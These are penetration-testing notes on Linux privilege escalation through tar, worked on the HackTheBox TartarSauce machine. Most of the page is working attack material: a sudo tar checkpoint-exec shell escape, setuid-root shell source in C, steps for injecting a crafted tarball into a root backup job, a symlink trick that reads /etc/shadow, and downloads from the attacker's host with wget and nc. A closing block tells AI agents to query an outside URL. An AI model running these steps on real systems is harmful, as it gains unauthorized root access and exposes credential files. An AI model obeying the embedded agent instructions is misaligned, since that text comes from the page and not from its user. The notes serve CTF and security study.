# TAR backups

## Easy PrivEsc

```
> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar

> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally
```

## Backup Script Vulnerability

* If root is doing anything as a job, you can attempt to re-direct it
* Copy the script back to your host and decompose it for analysis
* Examples of root running TAR:
  * [WildcardTarTouchCheckpoint](/06-linux-privesc/lx-privesc.md#wildcard-tar-touch-checkpoint)
  * Extracting TAR

## Just like NFS Root Squashing

* Similar to "NFS Root Squashing" and the "jail" box
  * Make setuid root owned
  * gzip the setuid
  * copy back inject into the 'temp' check folder
  * root will extract to 'check' the files
  * and thinks it belongs to him!
* REF: [NFSRootSquash](/06-linux-privesc/lx-privesc.md#nfs-root-squashing)

## Backup Script Discovery

* [Enum](/06-linux-privesc/lx-enum.md) to find the backup/script/job running
* Works just fine as 'user'

```
cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

pspy32             ..get more details
locate backuperer  ..investigate
```

## Backup Flaw Scenario

1. Backup script runs **TAR as Root** every 5 minutes
2. Deletes the previous checks: /var/tmp/.\* and /var/tmp/check.
3. Creates a gzip file of the directory /var/www/html with user-perms
4. Saves it in the file /var/tmp/.randomsha1
5. Sleeps for 30 seconds.
6. Creates the directory /var/tmp/check
7. **Extracts gzip with Root** /var/tmp/.randomsha1 to /var/tmp/check
8. If /var/www/html is different from backup: /var/tmp/check/var/www/html
   1. Report error.
   2. Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak
   3. And delete 'check' directory and .randomsha1

## Backup Flaw Exploit #1

* Script design is to tar as user, then **untar as root**
* Then compare previous version (which gives us 5 minutes)
* We can inject our evil tar:
* Script will: tar/copy/extract/compare.. and fail with error..
* Giving us 5 minutes to use **root-unzipped-files**

## Create the evil setuid

```
----------------------------
gcc        ..installed?
locate -r gcc$

kali:
uname -a   ..we have 32bit (should match target)
cp /opt/shells/setuid.c .

----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main ( int argc, char *argv[] )
{
   setreuid(0,0);
   execve("/bin/sh", NULL, NULL);
}

----------------------------
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

----------------------------
gcc 
apt search gcc-multilib

Compile
gcc -m32 -o setuid setuid.c   ..32 bit compile
```

## TAR the evil suid

* TAR embeds the userid that owns the file - in the actual archive
* We create this file and TAR as root .. it will stay root when extracted

```
----------------------------
kali:

sudo -i                        ..do this work as root
mkdir -p var/www/html          ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid   ..set the suid bit
chmod u+s var/www/html/suid    ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/   ..mock tar

send:
nc -nlvp 9002 < setuid.tar.gz


-----------------------
target:

> cd /var/tmp
> nc $MyIP 9002 > setuid.tzt.gz

> watch -n 1 'systemctl list-timers'
created '.6683a76af11'               ..temp extract
> cp setuid.tar.gz .6683a76af11      ..INJECTED !!!

> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'

> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!

>./ rsuid
whoami root!
```

## Backup Flaw Exploit #2

* diff runs as root
* updates to readable error file:
  * /var/backups/onuma\_backup\_test.txt
* tar an **evil symlink** that root will extract/diff

```
cd /var/tmp/var/www/html
ln -s /etc/shadow index.html      ..symlink
ln -s /root/root.txt index.html   ..alternate
cat index.html                    ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/     ..mock tar

watch -n 1 'systemctl list-timers'
created '.17f6c199'               ..temp extract
> cp symlink.tar.gz .17f6c199     ..swap our evil-tar-sym

job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !
```

## REF

* tartarHTB
* <https://ranakhalil101.medium.com/hack-the-box-tartarsauce-writeup-w-o-metasploit-e73393d4a0cd>

##


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/06-linux-privesc/tar-backup-tricks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.